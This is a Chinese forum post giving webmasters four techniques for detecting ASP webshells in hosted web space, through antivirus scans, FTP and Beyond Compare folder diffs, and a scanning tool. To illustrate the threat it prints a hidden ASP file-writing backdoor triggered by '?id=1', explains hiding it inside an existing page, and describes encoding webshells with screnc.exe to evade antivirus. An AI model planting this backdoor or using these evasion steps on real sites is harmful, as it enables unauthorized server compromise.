TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 2 e: [1 \ [, i+ b+ Z% v" M
3 b3 I- m0 G$ [5 J2 _# S4 M
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
9 C% B; P8 `1 x2 l+ _) Q# n* z0 l5 J5 `: Z# p$ w2 |- s2 U2 f6 T
一.技巧1:杀毒软件查杀 & g% E3 ~5 S" p8 ~ a
( r3 M0 s! X/ E8 M/ C4 F
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 8 R0 X. ]& P2 d1 U) p$ j
6 C" q, C: T, E
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 ! s% h/ O* x5 m5 i
7 Z( i6 m0 t( L, s二.技巧2:FTP客户端对比 9 B: N2 x9 g# k1 Z! i9 T' \
( v5 C4 T$ Z0 g; s& k$ a. r
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
, j1 h" @. n% j% g$ L9 o" x9 O! n& q4 r# k: w+ `" Q
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 . F9 E+ j3 `1 k) R& x/ ~9 l3 |
" a% X7 N: h9 e/ `) a经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
7 b4 j4 j- u g# n' _) P( ?& z# h3 B7 B
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 % v0 w7 w! ^5 J, }# o+ T& w
4 G c) o$ s$ \, X! j
盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 $ c2 k# w* Z: S/ ^" J
7 `7 ? @% @, |4 W0 \' c' Z4 n
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 ' ]8 f& b, r# _! b. H
& n: s" s+ ]2 O1 S! G( G, N这里以FlashFXP进行操作讲解。
, ~ n" d/ D7 c2 e
& H% ^, R1 H1 h0 C4 X# b步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 - G9 \ m! C' Z% T% F! ^$ Z# g
( s$ E/ U5 u3 _5 U' J7 g& e. ] h步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 . c! c; i W$ l E& h" H) a1 E6 ^+ Z
) w: x* k1 K6 U P& }2 Y9 Z
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 % I% U) i' N$ H% Z
三.技巧3:用Beyond Compare 2进行对比
( C# U( o2 j# F; r
" F/ l" y, A6 X p, o: H% s& ?上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
$ q$ T# ` Y \9 H8 c" Q4 t: m
; T- S; s D8 W# l, I, d〈% 9 A* v8 E; `- M/ P+ [
. o" a' G! t( r5 Q* S' z1 fon error resume next & D3 \& W1 f5 b" G$ a, ]% B
% c: [0 r% J* D7 C% }; B1 l- \; A
id=request("id")
6 o) H5 s+ v0 R: d. y- v
( V, B+ _& D( i) k& s( p( m8 M/ ]if request("id")=1 then ( Y8 U8 Q! ~3 d. B9 c w5 s" a
$ T1 O+ c$ @% s [0 r* R1 w& e" v# etestfile=Request.form("name")
0 J/ L' N; ~; V+ G2 q) Q: i; s4 C1 I1 C" S: T4 ^
msg=Request.form("message") 7 m1 R8 i- T9 l- `5 j b" ~/ ^
5 Y) o& c z3 W/ {) A3 ~
set fs=server.CreatObject("scripting.filesystemobject")
' G4 g( W: F* I: r: W2 o- z
6 p+ m5 ]7 H: Q) _. Y: L; dset thisfile=fs.openTestFile(testfile,8,True,0)
' K1 Z6 ^" ~3 b2 G/ j
# H8 b6 n. u; g) W$ _thisfile.Writeline(""&msg&"") 1 v6 w% F! x9 i7 H
) G. K, ?3 `8 c1 t
thisfile.close ' K) ?8 ^) i& E) K( u
2 W+ s7 B r: `2 Q& Dset fs=nothing
* c. g$ `) m; A7 P- a1 f: X8 y& A3 u5 E% f0 v. h% t3 Z* Y
%〉
2 b. w5 \; u9 B; H+ X2 W" Z0 Z7 f% l. e. o7 X
〈from method="post" Action="保存"?id=1〉
7 d& K$ n/ J; w) T5 l ?
( w4 W: F3 _7 E' ]8 a& \〈input type="text" size="20" name="Name"
" E+ O3 F a: ]" l- G, P
2 j' t( J4 }- U) ]+ g# uValue=〈%=server.mappath("XP.ASP")%〉〉 ! }# L. H! n# P
( \/ o9 b/ ^ j" R" `' k
〈textarea name="Message" class=input〉
6 @: _% \0 m7 A) D7 X5 s3 ?# p: U& e
' o1 u7 P* M# g9 @9 t" n〈/textarea〉 . z( R; s+ `, I: x* {: b+ H
- ?4 t( e/ b0 o
〈input type="Submit" name="send" Value="生成" - i: n% D7 V) R% [( {$ b7 ^
, f z' C; S bclass=input〉 $ u8 N0 B" H0 ], d
9 h4 ]( G( Y7 q ?0 C〈/from〉 - t- e, n1 x( R# Y) _. c! E
1 q6 U+ {; D3 m+ O: N: n5 t
〈%end if%〉 0 T% x. }6 N" Y
8 N. s0 T$ r& q; e! q
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
3 D, ^/ t$ ]. ]1 M4 {% d8 p1 X+ T6 i
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
4 K0 }9 I- r( s$ T$ T# E; S; ?9 m* a% w3 M- I! C4 Q3 [3 |9 n
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
# e' Z" ]4 u$ S& v" C/ X1 i! e: B I Q; \( X
Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
1 e8 x# l" \& F8 s" @2 S
) }' a5 G& I% \4 n看我来利用它完成渗透性asp木马的查找。 + Z/ ~( ^* Y/ }7 l4 Z3 q& q' H! D
3 f7 C$ Z+ ~2 _, I8 ~步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 8 g- V- H, D0 D
. r* G5 S0 y; _3 o+ R2 E步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
' E* ?+ C$ a2 u7 ` U7 o5 ]6 a6 }1 o1 v; Y! `2 n. r5 Q
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
! C/ e9 v* ?* U# b9 d" D; _) w3 R# B" Y7 E2 B
9 l" W( x/ T+ B0 H0 S9 E) a* X
四.技巧4:利用组件性能找asp木马
. L1 E/ I# n7 s3 t1 L6 d$ C: ^6 a5 ^; V5 z$ C& V
上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 4 ?: o* W1 G0 C5 \3 {
0 M% E4 |9 ?' m- |# A) ]如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 ; J7 F$ K3 B; a+ p" d. Z3 [4 o- k4 T
" R! E5 W# \5 p) p& f
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 * s# i. s' ~: S( h
' n7 C) i# T* a* q) y4 K使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
& Y3 I% L8 g7 X* v2 Z2 D
) D4 n; ` ~: M) T& t: ?一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 * z X5 @5 j( s7 c& ]: l5 `8 S
: c- L a& f& s! x4 a% m+ O1 N
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主